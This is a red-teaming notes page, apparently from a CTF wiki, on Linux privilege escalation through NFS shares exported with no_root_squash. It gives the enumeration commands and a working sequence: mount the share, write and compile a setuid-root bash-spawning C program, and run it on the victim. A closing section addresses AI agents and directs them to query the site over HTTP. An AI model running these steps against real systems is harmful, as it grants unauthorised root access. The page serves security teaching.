# NFS Root Squashing ## Background Knowlege: `no_root_squash` **Q: What is NFS?** **A: Network File System (NFS)** is an UDP-based RPC service. It allows remote hosts to mount file systems over a network and interact with those file systems as though they are mounted locally. **Q: What is root squash?** **A:** Root squash is a special **mapping** that maps **remote root user** (uid 0) to **local "nobody" user** (uid 65534), which has minimal privileges. **Q: What is `no_root_squash`?** In the `/etc/exports` file, if some directory is configured as `no_root_squash`, then a **remote root user** will be mapped to **local root user**. **Q: How is this related to privesc?** Suppose we are the root user on our attack machine. We can **mount** this target directory on our attack machine and write to this directory as the root user on the victim machine. The attack plan is: 1. Mount the target directory locally 2. Create a privesc exploit as SUID binary in the local directory 3. Execute this privesc exploit on the victim machine When we create the privesc exploit locally, this exploit will be created on the victim machine as a **root-owned** SUID binary simultaneously through NFS. Then we can execute this privesc exploit on the victim machine and get a root shell. ## Enumeration Examine `/etc/exports`: ```bash cat /etc/exports ``` Suppose `/tmp` has the `no_root_squash` option turned on, then the victim machine is vulnerable to NFS root squashing: ![no\_root\_squash](/files/-MfpI1lfqWkXpGpvqWIZ) On our attack machine, we can verify that the remote `/tmp` directory is mountable: ```bash showmount -e ``` ## Exploitation Create a temporary directory on our attack machine. ```bash mkdir /tmp/1 ``` Mount the target directory. ```bash mount -o rw,vers=2 : /tmp/1 ``` Prepare the privesc source code `x.c`. ```bash echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c ``` Compile the source code. ```bash gcc /tmp/1/x.c -o /tmp/1/x ``` Turn on the SUID bit. ```bash chmod +s /tmp/1/x ``` Trigger the payload on the victim machine. ```bash /tmp/x ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ret2basic.gitbook.io/ctfnote/red-teaming/privilege-escalation/linux-privilege-escalation/nfs-root-squashing.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.